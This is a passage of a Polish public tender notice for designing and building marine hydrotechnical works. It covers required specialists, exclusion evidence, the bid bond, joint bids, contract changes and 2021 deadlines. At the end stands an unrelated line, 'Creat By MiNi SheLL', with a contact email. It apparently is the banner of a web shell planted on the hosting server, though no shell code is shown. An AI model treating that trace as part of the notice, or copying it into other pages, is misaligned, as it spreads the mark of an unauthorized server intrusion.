Specjalisty nr 1 – Przedstawiciela Wykonawcy posiadającego następujące wykształcenie i doświadczenie:<br/>	wykształcenie wyższe,<br/>	udział w ostatnich 10 latach w co najmniej 2 zakończonych1 inwestycjach zrealizowanych według Warunków Kontraktowych FIDIC lub równoważnych2, na stanowisku Przedstawiciela Wykonawcy lub równoważnym (tj. jako osoba zarządzająca kontraktem w imieniu Wykonawcy), związanych z budową lub przebudową obiektu budowlanego, w tym jednej o wartości robót co najmniej 5.000.000,00 zł brutto (równowartość tej kwoty) oraz jednej o wartości robót co najmniej 2.500.000,00 zł brutto (równowartość tej kwoty).<br/><br/>1 Jako wykonanie (zakończenie) inwestycji należy rozumieć wystawienie Świadectwa Przejęcia (dla kontraktów realizowanych według warunków kontraktowych FIDIC) albo podpisanie protokołu odbioru robót lub dokumentu równoważnego (dla innych umów).<br/><br/>2 Przez warunki kontraktowe równoważne do Warunków Kontraktowych FIDIC rozumie się w szczególności warunki powstałe poprzez dostosowanie Warunków Kontraktowych FIDIC do prawa lokalnego krajów Unii Europejskiej np. warunki kontraktowe UAV, UAV-GC (Holandia), FABI-KVV (Belgia), VOB (Niemcy), JCT lub GMB (Wielka Brytania).<br/><br/>Doświadczenie Specjalisty nr 1 – Przedstawiciela Wykonawcy stanowi jedno z kryteriów oceny ofert, które zostały szczegółowo opisane w Rozdziale XX SWZ.<br/><br/>(ii)	Specjalisty nr 2 – Kierownika budowy posiadającego następujące wykształcenie, kwalifikacje i doświadczenie:<br/>	wykształcenie wyższe w zakresie budownictwa, <br/>	uprawnienia budowlane bez ograniczeń w specjalności inżynieryjnej hydrotechnicznej lub równoważne, <br/>	co najmniej 4 lata doświadczenia zawodowego jako kierownik budowy lub robót, <br/>	udział w co najmniej jednym kontrakcie realizowanym w branży hydrotechnicznej na stanowisku kierownika budowy lub kierownika robót;<br/><br/>(iii)	Specjalisty nr 3 – Kierownika robót hydrotechnicznych posiadającego następujące wykształcenie, kwalifikacje i doświadczenie:<br/>	wykształcenie wyższe w zakresie budownictwa, <br/>	uprawnienia budowlane bez ograniczeń w specjalności inżynieryjnej hydrotechnicznej lub równoważne, <br/>	co najmniej 4 lata doświadczenia zawodowego jako kierownik budowy lub robót; <br/><br/>(iv)	Specjalisty nr 4 – Projektanta w branży hydrotechnicznej posiadającego następujące wykształcenie, kwalifikacje i doświadczenie:<br/>	wykształcenie wyższe w zakresie budownictwa,<br/>	uprawnienia budowlane bez ograniczeń do projektowania morskich budowli hydrotechnicznych lub równoważne, <br/>	co najmniej 4 lata doświadczenia zawodowego w branży hydrotechnicznej morskiej jako projektant;<br/><br/>Wykonawca ma obowiązek zapewnić realizację Zamówienia przez wskazane przez Wykonawcę w wykazie osób, którego wzór stanowi Załącznik nr 7 do SWZ. W przypadku zaistnienia w toku realizacji Zamówienia okoliczności wymuszających konieczność zmiany którejkolwiek z osób wskazanych w niniejszym punkcie, Wykonawca ma obowiązek zapewnić na każde stanowisko osobę posiadającą co najmniej takie same kompetencje, wykształcenie i doświadczenie, jak osoba wskazana na to stanowisko w wykazie osób. Zmiana osób wskazanych w wykazie osób dokonywana jest na zasadach określonych w umowie w sprawie zamówienia publicznego, której wzór stanowi Załącznik nr 10 do SWZ (1-5), i w szczególności podlega zatwierdzeniu przez Zamawiającego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia:<br/>a)	informację z Krajowego Rejestru Karnego ,<br/>b)	oświadczenie Wykonawcy o braku przynależności do tej samej grupy kapitałowej,<br/>c)	zaświadczenie właściwego naczelnika urzędu skarbowego,<br/>d)	zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego,<br/>e)	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, <br/>f)	oświadczenie Wykonawcy którego wzór stanowi Załącznik nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	w celu potwierdzenia spełniania warunku, o którym w Rozdziale VII ust. 4 pkt 3) litera a) SWZ – dokumenty potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia, <br/><br/>2)	w celu potwierdzenia spełniania warunku, o którym w Rozdziale VII ust. 4 pkt 3) litera b) SWZ – informację banku lub spółdzielczej kasy oszczędnościowo – kredytowej, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem, <br/>3)	w celu potwierdzenia spełniania warunku, o którym mowa w Rozdziale VII ust. 4 pkt 4) litera a) SWZ – wykaz robót budowlanych wykonanych w okresie ostatnich 7 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; wykaz powinien zostać sporządzony zgodnie ze wzorem zawartym w Załączniku nr 6 do SWZ,<br/><br/>4)	w celu potwierdzenia spełniania warunku, o którym mowa w Rozdziale VII ust. 4 pkt 4) litera b) SWZ – wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień (wraz z podaniem daty uzyskania uprawnień), doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; wykaz powinien zostać sporządzony zgodnie ze wzorem zawartym w Załączniku nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> NIE DOTYCZY <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Każdy Wykonawca zobowiązany jest wnieść przed upływem terminu składania ofert wadium w wysokości: 70.000,00 złotych (słownie: siedemdziesiąt tysięcy złotych 00/100), oraz utrzymać je nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 PZP oraz art. 98 ust. 2 PZP.<br/><br/>2.	Wadium może być wniesione w jednej lub kilku następujących formach:<br/>1)	pieniądzu,<br/>2)	gwarancjach bankowych,<br/>3)	gwarancjach ubezpieczeniowych,<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2020 r. poz. 299 ze zm.).<br/><br/>3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego: 06 1010 1599 0028 9913 9120 0000. Jako tytuł przelewu należy wskazać: „Wadium w postępowaniu o udzielenie zamówienia na zaprojektowanie oraz wykonanie robót budowlanych – nr PO-II.2610.44.21. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego. W przypadku wniesienia wadium w formie pieniężnej, zaleca się dołączenie do oferty dowodu dokonania przelewu.<br/><br/>4.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 2 pkt 2) – 4) powyżej, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/><br/>5.	W przypadku składania przez Wykonawcę wadium w formie gwarancji, powinna ona zostać sporządzona zgodnie z obowiązującymi przepisami, a ponadto być bezwarunkowa i nieodwołalna oraz zawierać następujące elementy:<br/>1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib,<br/>2)	określenie wierzytelności, która ma być zabezpieczona gwarancją,<br/>3)	kwotę gwarancji,<br/>4)	termin ważności gwarancji,<br/>5)	zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego, które zawierać będzie oświadczenie, że:<br/>a)	Wykonawca, w odpowiedzi na wezwanie Zamawiającego, o którym mowa w art. 107 ust. 2 PZP lub art. 128 ust. 1 PZP, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 PZP, oświadczenia, o którym mowa w art. 125 ust. 1 PZP, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 PZP, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej, lub<br/>b)	Wykonawca, którego oferta została wybrana, odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub<br/>c)	Wykonawca, którego oferta została wybrana, nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, lub<br/>d)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana.<br/>6.	Zamawiający nie dopuszcza złożenia wadium w walucie innej niż złoty polski (dotyczy to wadium składanego w każdej z możliwych form). <br/><br/>7.	Pozostałe zasady składania wadium oraz jego zwrotu zawarte są w PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/><br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia, o których mowa w Rozdziale IX ust. 1 SWZ, składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/><br/>3.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań dotyczących przedmiotowego zamówienia.<br/><br/>4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane. W takim przypadku do oferty należy dołączyć oświadczenie, o którym mowa w Rozdziale XV ust. 4 pkt 5) SWZ.<br/>5.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia, których oferta zostanie uznana za najkorzystniejszą, zobowiązani są przed zawarciem umowy w sprawie zamówienia publicznego, przedstawić Zamawiającemu kopię umowy regulującej zasady ich współpracy (np. umowy konsorcjum). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany Umowy wymagają formy pisemnej pod rygorem nieważności i są wprowadzane w formie aneksu i nie mogą wykraczać poza treść art.455 ustawy Prawo<br/>zamówień publicznych.<br/>2. Zamawiający przewiduje możliwość zmian postanowień Umowy w zakresie terminu<br/>zakończenia robót, co może nastąpić wyłącznie za zgodą Zamawiającego jedynie w przypadku<br/>wystąpienia przeszkód nieleżących po stronie Wykonawcy, których nie można było przewidzieć<br/>w momencie zawarcia Umowy, zwłaszcza warunków atmosferycznych uniemożliwiających<br/>prowadzenie robót, o których mowa w § 3 ust. 3 Umowy.<br/>3. Wykonawca zobowiązuje się do niezwłocznego informowania Zamawiającego o niemożliwości<br/>kontynuowania prac z przyczyn wskazanych w ust. 2 , a termin zakończenia robót może zostać<br/>przesunięty wyłącznie o czas trwania przeszkód.<br/>4. Zmiana postanowień umowy w zakresie terminu, sposobu wykonania prac<br/>lub wynagrodzenia, będąca następstwem zmian powszechnie obowiązujących przepisów prawa,<br/>których uchwalenie lub zmiana nastąpiły po wszczęciu postępowania o udzielenie zamówienia<br/>publicznego, a które mają wpływ na realizację umowy i z których treści wynika konieczność lub<br/>zasadność wprowadzenia w odpowiednim zakresie zmian postanowień umowy.<br/>5. Zmiana wynagrodzenia Wykonawcy w przypadku zmiany ustawowej stawki podatku od<br/>towarów i usług (VAT) dla przedmiotu Umowy, odpowiednio do wprowadzonej zmiany.<br/>6. Zmiana umowy w przypadkach i na zasadach wynikających wprost z art. 455 ustawy z dnia<br/>11 września 2019 r. - Prawo zamówień publicznych r. w tym zwłaszcza zlecenia Wykonawcy<br/>przez Zamawiającego wykonania dodatkowych niezbędnych robót, nieobjętych zamówieniem<br/>podstawowym. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-16 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platforma elektroniczna https://ums.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-16 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Na ofertę składają się następujące dokumenty:<br/>1) formularz ofertowy, którego wzór stanowi Załącznik nr 1 do SWZ (dokument elektroniczny składany bezpośrednio na Platformie), wraz z załącznikami, tj. Załącznikiem nr 1a – Wypełnionym Wykazem Płatności (który należy wypełnić zgodnie z zasadami w nim szczegółowo opisanymi – „Opis sposobu obliczenia Ceny Oferty”), Załącznikiem nr 1b – Załącznikiem do Oferty (w którym należy wypełnić wszystkie puste rubryki oznaczone znakiem „[…]”) oraz Załącznikiem nr 1c – Pozacenowe Kryteria Oceny Ofert (który należy wypełnić w sposób umożliwiający dokonanie przez Zamawiającego oceny ofert)”

Creat By MiNi SheLL
Email: jattceo@gmail.com